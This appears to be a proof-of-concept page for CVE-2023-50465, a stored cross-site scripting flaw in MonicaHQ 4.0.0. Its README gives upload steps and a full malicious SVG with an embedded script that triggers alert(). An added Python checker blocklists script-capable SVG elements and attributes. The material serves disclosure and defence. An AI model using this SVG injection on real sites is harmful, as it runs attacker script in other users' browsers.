CVE-2023-50465 PoC — MonicaHQ Security Vulnerability

Source
Associated Vulnerability
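Title: MonicaHQ Security Vulnerability (CVE-2023-50465)
Description: MonicaHQ is a personal relationship management system from MonicaHQ. MonicaHQ version 4.0.0 contains a security vulnerability. An attacker can exploit it to upload an SVG document that contains a cross-site scripting vulnerability.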
Readme
# MonicaHQ XSS

## Exploitation of MonicaHQ XSS

- Create an account

- Create a contact

- In Documents, upload a malicious SVG file

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert("Monicahq XSS Poc");
  </script>
</svg>

```
- Access the uploaded file

![image](https://github.com/Crypt0Cr33py/monicahqvuln/assets/108440914/71f6ec20-148b-4973-ac42-83ae7a5c0ae6)
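
A defender's view of the steps above, as an added example that is not part of the original README or of MonicaHQ's code: an upload-time check that parses an SVG with Python's standard-library expat bindings and reports script-capable content. The function name `svg_active_content` and the element blocklist are assumptions made for this illustration.

```python
import xml.parsers.expat

# Assumed blocklist: elements that can run script or embed foreign markup in a rendered SVG.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}

def svg_active_content(data: bytes) -> list[str]:
    """Return reasons to reject an uploaded SVG; an empty list means none were found."""
    findings: list[str] = []
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def local(name: str) -> str:
        # With namespace processing, names arrive as "<namespace-uri> <local-name>".
        return name.rsplit(" ", 1)[-1].lower()

    def on_start(name, attrs):
        if local(name) in ACTIVE_ELEMENTS:
            findings.append(f"element <{local(name)}>")
        for attr, value in attrs.items():
            # Browsers ignore whitespace and control characters inside a URL scheme.
            compact = "".join(ch for ch in value if ch > " ").lower()
            if local(attr).startswith("on"):
                findings.append(f"event handler attribute {local(attr)}")
            elif local(attr) == "href" and compact.startswith("javascript:"):
                findings.append("javascript: URL in href")

    def on_entity_decl(*_args):
        # Refuse DTD entity declarations outright (entity-expansion tricks).
        raise ValueError("entity declaration")

    parser.StartElementHandler = on_start
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(data, True)
    except (xml.parsers.expat.ExpatError, ValueError) as exc:
        findings.append(f"unparseable or forbidden XML: {exc}")
    return findings

# The PoC document from the README (script element condensed), and a constructed clean SVG.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert("Monicahq XSS Poc");</script>
</svg>"""
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><polygon points="0,0 0,50 50,0"/></svg>'

if __name__ == "__main__":
    print(svg_active_content(POC_SVG), svg_active_content(CLEAN_SVG))
```

A blocklist check like this is one layer only; serving user uploads with `Content-Disposition: attachment` or a restrictive `Content-Security-Policy` header keeps script from running even if a file slips past it.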
File Snapshot

```
[4.0K] /data/pocs/60e7492b8f32795c2c32a045815a6dd8c7ff3c61
├── [8.9M] monicahqpoc.zip
└── [ 659] README.md

0 directories, 2 files
```